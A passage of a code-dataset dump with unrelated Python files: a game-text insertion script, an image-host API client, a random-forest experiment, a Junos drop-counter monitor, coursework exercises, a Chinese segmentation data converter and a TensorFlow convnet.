제어코드로 \"0A\" 입니다\n삽입시 이를 replace 해야될겁니다.\n\"\"\"\n\nimport time\nimport sys\nimport binascii\nimport struct\nimport os\n\ntablefile = \"수정UTF_수정_실전_대사삽입용.tbl\"\nNULLBYTES = \"0000\"\nTBLhex = []\nTBLword = []\nWriteHexArr = []\nWriteOffsetArr = []\nWriteLengthArr = []\n\n\ndef readTBL(TBL):\n global TBLword\n global TBLhex\n file = open(TBL, \"r\", encoding='utf-8')\n lines = file.readlines()\n for line in lines:\n if line == \"\":\n continue\n if line.count(\"=\") == 2:\n line = line.split(\"=\")\n TBLword.append(\"=\")\n TBLhex.append(line[0])\n else:\n line = line.replace(\"\\n\", \"\")\n line = line.replace(u\"\\ufeff\", '') # BOM고유오류 조정\n line = line.split(\"=\")\n\n if line == ['']:\n continue\n TBLword.append(line[1])\n TBLhex.append(line[0])\n print(TBLword)\n print(TBLhex)\n return\n\n\ndef string_hex_to_hex(str, dst):\n for i in range(0, int(len(str) / 2)):\n outtemp = int(str[i * 2:i * 2 + 2], 16)\n outtemp2 = struct.pack(\"B\", outtemp)\n dst.write(outtemp2)\n\n\nreadfile = sys.argv[1]\ntry:\n writefile = sys.argv[2]\nexcept IndexError:\n writefile = readfile\n writefile += \".out\"\nreadTBL(tablefile)\n\ninFp = open(readfile, \"r\", encoding=\"utf-8\")\noutFp = open(writefile, \"wb\")\n\nlineIndex = (inFp.readline())\nprint(lineIndex)\nlineIndex = int(lineIndex.replace(u\"\\ufeff\", ''))\nfor i in range(0, lineIndex):\n print(\"%d of %d\"%(i+1,lineIndex))\n WriteHex = \"\"\n line = inFp.readline().replace(\"\\\\n\", \"&\").replace(\"\\n\", \"\")\n print(line)\n for j in range(0, len(line)):\n try:\n Temp = TBLword.index(line[j])\n WriteHex += TBLhex[Temp]\n except:\n raise\n WriteHex += (NULLBYTES)\n WriteHexArr.append(WriteHex)\n if i == 0:\n WriteOffsetArr.append(0x08 + (lineIndex * 0x08))\n # Different Types\n else:\n if NULLBYTES == \"0000\":\n WriteOffsetArr.append(WriteOffsetArr[i - 1] + WriteLengthArr[i - 1] + 2)\n else:\n WriteOffsetArr.append(WriteOffsetArr[i - 1] + WriteLengthArr[i - 1] + 1)\n if NULLBYTES == \"0000\":\n WriteLengthArr.append((len(WriteHex) // 2) - 2)\n else:\n WriteLengthArr.append((len(WriteHex) // 2) - 1)\noutFp.write(\"TEXT\".encode('ascii'))\noutFp.write(struct.pack(\": dict of info, or None if hash isn't valid. see info() docs\n \"\"\"\n return json.loads(urllib.request.urlopen(API_URL + \"info?list=\" + \",\".join(hashlist)).read())\n\ndef exists(hash):\n \"\"\"\n Returns boolean\n \"\"\"\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/exists\").read())[\"exists\"]\n\ndef delete(hash):\n \"\"\"\n Returns dict:\n Either\n * status: string, always \"success\", meaning: The IP matches the stored hash and the file was deleted.\n or\n * error: integer, error code.\n 401 = The IP does not match the stored hash.\n 404 = There is no file with that hash.\n \"\"\"\n try:\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/delete\").read())[\"status\"]\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\ndef status(hash):\n \"\"\"\n Returns dict:\n Either\n * status: string, one of four values:\n \"done\": The file has been processed.\n \"processing\": The file is being processed or in the processing queue.\n \"error\": The processing step finished early with an abnormal return code.\n \"timeout\": The file took too long to process.\n or\n * error: integer, error code.\n 404 = There is no file with that hash.\n \"\"\"\n try:\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/status\").read())\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\ndef upload(address, url=True, geturl=False):\n \"\"\"\n Returns dict:\n Either\n * hash: string, resulting image hash\n or\n * error: integer, error code\n 409 = The file was already uploaded.\n 420 = The rate limit was exceeded. Enhance your calm.\n 415 = The file extension is not acceptable.\n * hash: string, resulting image hash, if error code is 409\n \"\"\"\n if url:\n try:\n data = json.loads(urllib.request.urlopen(API_URL + \"upload/url\", urllib.parse.urlencode({'url': address})).read())\n if geturl:\n return BASE_URL + data[\"hash\"]\n else:\n return data\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n else:\n import MultipartPostHandler\n opener = urllib.request.build_opener(MultipartPostHandler.MultipartPostHandler)\n try:\n data = json.loads(opener.open(API_URL + \"upload/file\", {'file': open(address, \"rb\")}).read())\n if geturl:\n return BASE_URL + data[\"hash\"]\n else:\n return data\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\nif __name__ == \"__main__\":\n from sys import argv\n if len(argv) > 2:\n if argv[1] == \"uploadf\" or argv[1] == \"upload\":\n print(upload(argv[2], url=False))\n elif argv[1] == \"uploadu\" or argv[1] == \"url\":\n print(upload(argv[2]))\n elif argv[1] == \"info\":\n print(info(argv[2]))\n elif argv[1] == \"infol\":\n print(info_list(argv[2].split(\",\")))\n elif argv[1] == \"exists\":\n print(exists(argv[2]))\n elif argv[1] == \"delete\":\n print(delete(argv[2]))\n elif argv[1] == \"status\":\n print(status(argv[2]))\n else:\n print(\"Unsupported function.\")\n else:\n print(\"Usage: %s \" % argv[0])\n print(\"Functions:\")\n print(\"upload: filename uploadf: filename uploadu: url\")\n print(\"url: url info: hash infol: comma-separated hash list\")\n print(\"exists: hash delete: hash status: hash\")\n print(\"by Steven Smith (blha303) 2013\")\n print(\"MIT license\")\n print(\"Support: https://gist.github.com/blha303/6239248 or mcrush@blha303.com.au\")\n","sub_path":"imgrush.py","file_name":"imgrush.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102976331","text":"import pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cross_validation import train_test_split, cross_val_score\nfrom sklearn.metrics import classification_report\n\n###################\n# import the data #\n###################\n\ndata = pd.read_csv('/Users/jeremylewallen/Desktop/expedia/data/train_csv_50000.csv')\n\n#############\n# x-columns #\n#############\n\nhotel_market = data['hotel_market']\nuser_location_region = data['user_location_region']\n\n############\n# y-column #\n############\n\nhotel_cluster = data['hotel_cluster']\n\ndef one_hot_encode(column):\n\n one_hot = OneHotEncoder()\n\n hotel_market = column.values\n\n hotel_market = hotel_market.reshape((49999,1))\n\n hotel_market_one_hot = one_hot.fit_transform(hotel_market)\n\n hotel_market_one_hot = hotel_market_one_hot.todense()\n\n return hotel_market_one_hot\n\n##############################\n# one hot encode the columns #\n##############################\n\nhotel_market_encoded = one_hot_encode(hotel_market)\n\nuser_location_region_encoded = one_hot_encode(user_location_region)\n\nhotel_cluster_encoded = one_hot_encode(hotel_cluster)\n\n\n#not sure\n\nhotel_cluster_slice = hotel_cluster_encoded[:,0]\n\n#########################\n# combine the x columns #\n#########################\n\ntrain_data = np.hstack((hotel_market_encoded, user_location_region_encoded))\n\n##############################################\n# split the data into training and test data #\n##############################################\n\nx_train, x_test, y_train, y_test = train_test_split(train_data, hotel_cluster_slice)\n\ny_train = y_train.reshape(37499,)\n\ny_train[:20]\n\ny_train = y_train[0]\n\ny_train_list = y_train.tolist()\n\n####################\n## train the data ##\n####################\n\nrandom_forest = RandomForestClassifier(class_weight='auto')\n\nrandom_forest.fit(x_train, y_train_list[0])\n\n#############################\n## score the random forest ##\n#############################\n\npredictions = random_forest.predict(x_test)\n\nprint(classification_report(y_test, predictions))","sub_path":"random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329929245","text":"#Jay Wilson, Wushu(Wilson) Ouyang\n\n# using netmiko to show how flexible HB is. Most JNPR people would used PYEZ\nfrom netmiko import ConnectHandler\nfrom junossecure.junos_secure import junos_decode\n\n# define a routine to connect to a device and issue a command to JUNOS\ndef get_junos_command(device, command):\n net_connect = ConnectHandler(**device)\n output = net_connect.send_command(command)\n net_connect.disconnect()\n return output\n\n# Main routine for HB to run when called via a rule\ndef run():\n\n # get the device specifices from HB for the device that is being queried\n # and create a python dictionary with the information that will be used\n # for establishing a NETCONF session\n host = __pillar__[\"proxy\"][\"host\"]\n user= __pillar__[\"proxy\"][\"username\"]\n pwd = junos_decode(__pillar__[\"proxy\"][\"encoded_password\"])\n device = {\n \"device_type\": \"juniper_junos\",\n \"host\": host,\n \"username\": user,\n \"password\": pwd,\n }\n # dictionary of what each BCM counter means. Can be used in trigger messages\n # to explain what the traffic types the drop(s) are\n meaning = {\n 'RDBGC0': '(All Received Drop)',\n 'RDBGC1': '(Filter Block Drop)',\n 'RDBGC2': '(Multicast Drop)',\n 'RDBGC3': '(VLAN Drop)',\n 'RDBGC4': '(Policy Discard Drop)',\n 'RDBGC5': '(Parity Error Drop)',\n 'RDBGC6': '(VLAN Field Processor Drop)',\n 'RDBGC7': '(L2/L3 Lookup DST_DISCARD Drop)',\n 'RDBGC8': '(11 other error Drops)',\n 'TDBGC1': '(IPv6 L3 and IPMC Aged and Drop)',\n 'TDBGC3': '(All Transmit Drop)',\n 'TDBGC5': '(IPv4 L3 and IPMC Aged and Drop)',\n 'TDBGC6': '(L2 Multicast Drop)',\n 'TDBGC7': '(Aged Drop)',\n 'TDBGC8': '(STP not in FWD state Drop)',\n 'TDBGC9': '(VXLT Translate Drop)',\n 'TDBGC10': '(Invalid VLAN Drop)',\n 'TDBGC11': '(6 other error Drops)',\n }\n notdrops = ['TDBGC0', 'TDBGC2', 'TDBGC4']\n\n # commands that will be issued to a JUNOS device to retrieve specific VTP data\n command1 = 'request routing-engine execute command \"/usr/sbin/cprod -A fpc0 -c \\'show dcbc ifd all\\' | awk \\'NR > 3 {print $4}\\' | xargs -I [] /usr/sbin/cprod -A fpc0 -c \\'set dcbc bc \\\\\"show c []\\\\\"\\' | awk \\'/RDBGC0/ {print $0}; /TDBGC/ {print $0}\\'\"'\n command2 = 'request routing-engine execute command \"/usr/sbin/cprod -A fpc0 -c \\'show dcbc ifd all\\'\"'\n\n # issue \"command1\" to the specified JUNOS device\n output1 = get_junos_command(device,command1)\n #print(result)\n # NETCONF streams the data. split it into lines based on end of line character\n output1 = output1.split(\"\\n\")\n output1_list = []\n for line in output1:\n if line:\n line = line.split()\n # the counter is in the last column of output and it is a string\n value = line[3]\n # remove the + sign at the start of the string and any commas\n value = value[1:].replace(\",\", \"\")\n # convert the string to an integre to be stored by HB\n value = int(value)\n #print(\"value\", value)\n # key is the counter name as listed in the meaning dictionary + a .\n # we need to split out the counter name from the vty-port-index\n key = line[0]\n name = line[0].split(\".\")[0]\n #print(\"name\", name)\n port = line[0].split(\".\")[1]\n #print(\"port\", port)\n why = meaning.get(name)\n if notdrops.count(name) == 0 :\n output1_list.append({\"tags\": {\"key\": key}, \"fields\": {\"name\": name, \"port\":port, \"value\":value, \"why\":why}})\n\n # issue \"command2\" to the specified JUNOS device\n output2 = get_junos_command(device,command2)\n output2 = output2.split(\"\\n\")\n # remove the first 3 lines because they are headers\n output2_new = output2[4:]\n\n ifd_port_list = []\n for item in output2_new:\n if item:\n item = item.split()\n ifd = item[0]\n port = item[4]\n ifd_port_list.append({\"ifd\":ifd, \"port\":port})\n\n # combine the output from the 2 commands based on the port number\n for item in output1_list:\n for ifd_port in ifd_port_list:\n if ifd_port[\"port\"] == item[\"fields\"][\"port\"]:\n item[\"fields\"][\"ifd\"] = ifd_port[\"ifd\"]\n\n #for item in output1_list: print(item)\n return output1_list\n","sub_path":"helper-files/pfe_port_value.py","file_name":"pfe_port_value.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185009203","text":"# CS 5001\n# Fall 2019\n# HW1 - Data Types and Arithmetic Operations\n\n# TEST CASE 1\n# distance = 3000m, pool size = 35m, time = 45:44 =>\n# 85 laps, pace per 100m = 1:31, avg. speed = 3.9 km/hr\n# TEST CASE 2\n# distance = 800m, pool size = 20, time = 19:30 =>\n# 40 laps, pace per 100m = 2:26, avg. speed = 2.5 km/hr\n# TEST CASE 3\n# distance = 1400m, pool size = 60, time = 31:19 =>\n# 23 laps, pace per 100m = 2:14, avg. speed = 2.7 km/hr\n\n# PURPOSE\n# Returns the amount of laps swam.\n# SIGNATURE\n# calc_laps(num_distance, num_size) :: Int, Int => Float\n# EXAMPLES\n# calc_laps(1400, 60) => 23\n# calc_laps(800, 20) => 40\n\n\ndef calc_laps(num_distance, num_size):\n return num_distance // num_size\n\n\n# PURPOSE\n# Returns the pace of the swimmer per 100m in minutes.\n# SIGNATURE\n# calc_pace(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_pace(3000, 45 , 44) => 1.0\n# calc_pace(800, 19, 30) => 2.0\n\n\ndef calc_pace(num_distance, num_minutes, num_seconds):\n minutes_in_seconds = num_minutes * 60\n total_seconds = minutes_in_seconds + num_seconds\n num_of_100m_in_distance = num_distance / 100\n pace_in_seconds = total_seconds // num_of_100m_in_distance\n pace_minutes = pace_in_seconds // 60\n return pace_minutes\n\n\n# PURPOSE\n# Returns the pace of the swimmer per 100m in seconds.\n# SIGNATURE\n# calc_pace_in_sec(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_pace_in_sec(1400, 31 , 19) => 14.0\n# calc_pace_in_sec(800, 19, 30) => 26.0\n\n\ndef calc_pace_in_sec(num_distance, num_minutes, num_seconds):\n minutes_in_seconds = num_minutes * 60\n total_seconds = minutes_in_seconds + num_seconds\n num_of_100m_in_distance = num_distance / 100\n pace_in_seconds = total_seconds // num_of_100m_in_distance\n pace_minutes = pace_in_seconds // 60\n pace_minutes_convert = pace_minutes * 60\n seconds = pace_in_seconds - pace_minutes_convert\n return seconds\n\n\n# PURPOSE\n# Returns the speed in kilometers per hour.\n# SIGNATURE\n# calc_speed(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_speed(3000, 45 , 44) => 3.9\n# calc_speed(800, 19, 30) => 2.5\n\n\ndef calc_speed(num_distance, num_minutes, num_seconds):\n full_min = round((num_seconds / 60), 1)\n min_in_hour = num_minutes + full_min\n rem_min_in_hour = 60 - min_in_hour\n percent_rem_min = rem_min_in_hour / min_in_hour\n km_per_hour = (((percent_rem_min * num_distance) + num_distance) / 1000)\n rounded_km = round(km_per_hour, 1)\n return rounded_km\n\n\n# PURPOSE\n# Formats the pace line that is shown to the user.\n# SIGNATURE\n# pace_line(pace_min, pace_sec) :: Int, Int => Str\n# EXAMPLES\n# pace_line(1, 31) => \"Your pace per 100m was 1:31.\"\n# pace_line(2, 26) => \"Youe pace per 100m was 2:26.\"\n\n\ndef pace_line(pace_min, pace_sec):\n return \"Your pace per 100m was {}:{}.\".format(pace_min, pace_sec)\n\n\ndef main():\n distance = int(input(\"How many meters did you swim? \"))\n size = int(input(\"How big was the pool in meters? \"))\n print(\"How long did it take you, in minutes and seconds?\")\n minutes = int(input(\"Enter the number of minutes first: \"))\n seconds = int(input(\"Now enter the seconds: \"))\n\n laps = calc_laps(distance, size)\n pace_min = int(calc_pace(distance, minutes, seconds))\n pace_sec = int(calc_pace_in_sec(distance, minutes, seconds))\n avg_speed = calc_speed(distance, minutes, seconds)\n\n print(\"You swam\", laps, \"laps.\")\n print(pace_line(pace_min, pace_sec))\n print(\"Your average speed was\", avg_speed, \"km/hr.\")\n\n\nmain()\n","sub_path":"Fall 2019/HW1/swimstats.py","file_name":"swimstats.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271922020","text":"cities = {\n 'New York City': {\n 'country': 'usa',\n 'population': 8_623_000,\n 'fact': 'New York City is made up of five boroughs: Manhattan, The Bronx, Queens, Brooklyn, and Staten Island'\n },\n 'Tokyo': {\n 'country': 'japan',\n 'population': 9_273_000,\n 'fact': 'Vending machines are available in Tokyo at every 12 meter distance'\n },\n 'Mumbai': {\n 'country': 'india',\n 'population': 18_410_000,\n 'fact': 'There is only 1.1 square metres of open space for people living in Mumbai'\n }\n}\nfor city, city_info in cities.items():\n print(f'{city}:')\n country = city_info['country']\n population = city_info['population']\n fact = city_info['fact']\n if city_info['country'] == 'usa':\n print(f'\\tCountry: {country.upper()}')\n else:\n print(f'\\tCountry: {country.title()}')\n print(f'\\tPopulation: {population}')\n print(f'\\tInteresting fact: {fact}.')\n print('\\n')\n","sub_path":"basics/dictionaries/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613098881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 21 18:18:11 2019\n\n@author: AndresArciniegas\n\"\"\"\n\nfrom hanziconv import HanziConv\n\n# AS (Traditional Chinese)\n# CITYU (Traditional Chinese)\n# MSR (Simplified Chinese)\n# PKU (Simplified Chinese)\n\n# The task is to convert all of them to simplified chinese. So, AS and CITYU must be processed\n\n#%%\ndef reorder_elements_in_list_by_words(sentences, length=50): \n \"\"\"\n Reordering (reshaping) the words in the sentences allows to reduce the number of them, avoiding useless computations when padding.\n \n :param sentences: is a list of strings to be reordered by words\n :param length: size of each new sentence (no. of words).\n \"\"\"\n sents_single = ' '.join(sentences) #The space is necessary to avoid involuntary merging of words\n sents_simp_split = sents_single.split(' ')\n sents_reordered = []\n num_of_elems = round(len(sents_simp_split)/length)\n for i in range(num_of_elems):\n newsent = sents_simp_split[i*length:(i+1)*length]\n sents_reordered.append(' '.join(newsent))\n print('\\n[INFO] Number of sentences in original file: ', len(sentences))\n print('[INFO] Number of sentences in reordered file: ', len(sents_reordered))\n print(\"[INFO] Porcentage of length respect to input:\", round(len(sents_reordered)/len(sentences)*100,2),'%')\n\n return sents_reordered \n \ndef reorder_elements_in_list_by_chars(sentences, length=100):\n \"\"\"\n Reordering (reshaping) the words in the sentences allows to reduce the number of them, avoiding useless computations when padding.\n \n :param sentences: is a list of strings to be reordered by words\n :param length: size of each new sentence (no. of words).\n \"\"\"\n sents_single = ' '.join(sentences)\n sents_r = []\n spaces = -1\n p0 = 0; pos_buf = 0\n for pos,char in enumerate(sents_single):\n if char == \" \":\n spaces += 1 # # Spaces accumulator\n #print(sent[p0:pos], p0, pos, pos-p0, maxlen + spaces, pos_buf)\n #if p0==0: \n if pos-p0 > length + spaces:\n #print(\"taken!\")\n # Takes since the range of characters until the previous space position (not the current), \n # so the length is kept always below the 'length' parameter\n sents_r.append(sents_single[p0:pos_buf]) \n p0 = pos_buf+1; \n spaces=0;\n pos_buf = pos \n if pos == len(sents_single)-1: #Include the last sentence, no matter how long it is\n sents_r.append(sents_single[p0:pos+1]) \n print('\\n[INFO] Number of sentences in original file: ', len(sentences))\n print('[INFO] Number of sentences in reordered file: ', len(sents_r))\n print(\"[INFO] Porcentage of length respect to input:\", round(len(sents_r)/len(sentences)*100,2),'%')\n # lsentsr = [len(x.replace(' ','')) for x in sents_r]\n# print(lsentsr)\n\n return sents_r \n \ndef save_into_file(lines, file_path):\n with open(file_path, 'w', encoding='utf8') as file:\n file.writelines('\\n'.join(lines))\n\ndef to_simplified_chinese(sentences):\n return [HanziConv.toSimplified(s) for s in sentences]\n\ndef file_to_simplified_chinese(filePath,save=True,save_file=\"\"):\n with open(file_path, encoding='utf8') as file:\n sents = file.read().splitlines()\n sents = [x.replace(' ',' ').replace('\\u3000' ,' ') for x in sents]\n sents_simp = to_simplified_chinese(sents) \n return sents, sents_simp\n\n#%%\n\n#%%\nlength = 30 \n\n#%%\n# ----------------------------------------------\n################# ALL MERGED ##################\n# ----------------------------------------------\nprint(\"[INFO] Processing ALL Datasets merged (Test)\")\nfile_path = \"../dataset/icwb2-data/gold/ALL_test_gold_simp_reordered_shuf.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path,length)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/as_test_gold_simp_reordered_30.utf8\")\n#%%\nprint(\"[INFO] Processing ALL Datasets merged (Train)\")\nfile_path = \"../dataset/icwb2-data/training/ALL_training_simp_reordered_shuf.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path,length)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder, \"../dataset/icwb2-data/training/ALL_training_simp_reordered_shuf_30.utf8\")\n \n#%%\n# ----------------------------------------------\n###################### AS ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing AS Dataset (Gold)\")\nfile_path = \"../dataset/icwb2-data/gold/as_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/as_test_gold_simp_reordered.utf8\")\n#save_into_file(sents_simp , \"../dataset/icwb2-data/gold/as_test_gold_simp.utf8\")\n\nprint(\"[INFO] Processing AS Dataset (Training)\")\nfile_path = \"../dataset/icwb2-data/training/as_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\n#save_into_file(sents_reorder , \"../dataset/icwb2-data/training/as_training_simp_reordered.utf8\")\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/as_training_simp_reordered.utf8\")\n#save_into_file(sents_simp , \"../dataset/icwb2-data/training/as_training_simp.utf8\")\n\n#%%\n# ----------------------------------------------\n##################### CITYU ####################\n# ----------------------------------------------\nprint(\"[INFO] Processing CITYU Dataset (Gold)\")\n\nfile_path = \"../dataset/icwb2-data/gold/cityu_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/cityu_test_gold_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing CITYU Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/cityu_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/cityu_training_simp_reordered.utf8\")\n\n#%%\n# Reorder also the ones that were already in simplified chinese\n# If processed by the simplified-chinese converted, they remain the same\n\n# ----------------------------------------------\n##################### MSR ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing MSR Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/msr_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/msr_training_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing MSR Dataset (Gold)\")\n\nfile_path = \"../dataset/icwb2-data/gold/msr_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/msr_test_gold_simp_reordered.utf8\")\n\n#%%\n# ----------------------------------------------\n##################### PKU ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing PKU Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/pku_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/pku_training_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing PKU Dataset (Gold)\")\n\nfile_path = \"../dataset/icwb2-data/gold/pku_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/pku_test_gold_simp_reordered.utf8\")\n\n\n ","sub_path":"resources/FilesUsedForTraining/HanziAndDatasetConversion.py","file_name":"HanziAndDatasetConversion.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331422751","text":"\"\"\"\nCP1404/CP5632 - Practical\nRandom word generator - based on format of words\n\nAnother way to get just consonants would be to use string.ascii_lowercase\n(all letters) and remove the vowels.\n\"\"\"\nimport random as r\n\nMAX_LENGTH = 8\nMIN_LENGTH = 3\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\n\nlength = r.randint(MIN_LENGTH, MAX_LENGTH)\nword_format = ''\nfor x in range(length):\n word_format += r.choice(['c', 'v'])\n# word_format = \"ccvcvvc\"\n# word_format = input(\"Word Format: \")\nword = \"\"\nfor kind in word_format:\n if kind == \"c\":\n word += r.choice(CONSONANTS)\n else:\n word += r.choice(VOWELS)\n\nprint(word)\n","sub_path":"prac_02/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166827563","text":"from setuptools import setup\n\nVERSION = \"0.0.1dev0\"\n\nsetup(\n name='mvp de ml-practico',\n version=VERSION,\n description='main etl for machine learning model',\n author='',\n author_email='',\n classifiers=[\n 'Programming Language :: Python :: 3.7.0',\n ],\n packages=['mlp_mvp'],\n install_requires=['scikit-learn==0.23.0']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34305271","text":"import time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef grid_1d_gp(r,n):\r\n x = [0 for i in range(n+1)]\r\n rng=(0,1)\r\n #gp sum\r\n sum=0\r\n for i in range(n):\r\n sum = sum + pow(r,i)\r\n x0 = (rng[1]-rng[0])/sum\r\n x[0] = rng[0]\r\n\r\n for i in range(n):\r\n x[i+1] = x[i] + x0*pow(r,i)\r\n\r\n return(x)\r\n\r\ndef matrix_form(x,bc):\r\n\r\n p=1\r\n u=1\r\n t=0.02\r\n\r\n n = len(x)-2\r\n # print(n)\r\n a = [[0 for i in range(n)] for j in range(n)]\r\n #rhs vector\r\n b = [0 for i in range(n)]\r\n\r\n for i in range(1,n+1):\r\n gamma = ( (-p*u)/(x[i+1]-x[i-1]) ) - ( (2*t)/((x[i]-x[i-1])*(x[i+1]-x[i-1])) )\r\n alpha = ( (2*t)/((x[i+1]-x[i-1])*(x[i+1]-x[i])) ) + ( (2*t)/((x[i+1]-x[i-1])*(x[i]-x[i-1])) )\r\n beta = ( (p*u)/(x[i+1]-x[i-1]) ) - ( (2*t)/((x[i+1]-x[i])*(x[i+1]-x[i-1])) )\r\n\r\n j=i-1\r\n if(j is 0):\r\n a[0][0]=alpha\r\n a[0][1] =beta\r\n b[0] = 0 - (gamma*bc[0])\r\n elif(j is n-1):\r\n a[n-1][n-1]=alpha\r\n a[n-1][n-2]=gamma\r\n b[n-1] = 0 - (beta*bc[1])\r\n else:\r\n a[j][j-1] = gamma\r\n a[j][j] = alpha\r\n a[j][j+1] = beta\r\n\r\n return(a,b)\r\n\r\ndef gauss_elm(A,B):\r\n n= len(B)\r\n # step 1: Gaussian elimination.\r\n i=0\r\n while i < n:\r\n # pivots\r\n pivot = A[i][i]\r\n j=i+1\r\n while j=0:\r\n sum = 0\r\n k=i+1\r\n while k= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n count += 1\n return count\n\n def countSubstrings(self, s: str) -> int:\n count = 0\n\n for i in range(len(s)):\n count = self.expand(s, i, i, count)\n count = self.expand(s, i, i + 1, count)\n\n return count\n\n\n\"\"\"动态规划法, dp表\"\"\"\n# 若s[i..j]为回文串,则dp[i][j]=True\nclass Solution:\n def countSubstrings(self, s: str) -> int:\n dp = [[False] * len(s) for _ in range(len(s))]\n # 初始化base case,对角线即单个字符的时候为True\n for i in range(len(s)):\n dp[i][i] = True\n\n for i in range(len(s), -1, -1):\n for j in range(i + 1, len(s)):\n if s[i] == s[j]:\n if j - i == 1:\n # 特殊情况\n dp[i][j] = True\n else:\n dp[i][j] = dp[i + 1][j - 1]\n\n res = 0\n for dp_i in dp:\n res += dp_i.count(True)\n\n return res\n\n\ns = 'aaa'\n","sub_path":"动态规划/二维数组/647-回文子串.py","file_name":"647-回文子串.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358255553","text":"import tensorflow as tf\n# from tensorflow.contrib.layers.python import layers as tf_layers\nimport numpy as np\nfrom utils import count_params_in_scope\nfrom data import tf_standardize\n\n# 5-layer convnet: from cbfinn's maml implementation\n\n\nclass ConvNet():\n\n def __init__(self, args):\n\n self.args = args\n self.channels = 3\n self.dim_hidden = [16, 32, 32, 64, 64]\n # self.dim_hidden = [16, 16, 16, 32, 32]\n self.dim_output = 10\n self.img_size = 32\n self.norm = 'None'\n self.max_pool = True\n self.floattype = tf.float64 if self.args.bit64 else tf.float32\n self.inttype = tf.int64 if self.args.bit64 else tf.int32\n\n def construct_weights(self):\n weights = {}\n\n conv_initializer = tf.contrib.layers.xavier_initializer_conv2d(dtype=self.floattype)\n fc_initializer = tf.contrib.layers.xavier_initializer(dtype=self.floattype)\n k = 3\n\n for i in range(len(self.dim_hidden)):\n previous = self.channels if i == 0 else self.dim_hidden[i - 1]\n weights['conv' + str(i + 1)] = tf.get_variable('conv' + str(i + 1), [k, k, previous,\n self.dim_hidden[i]], 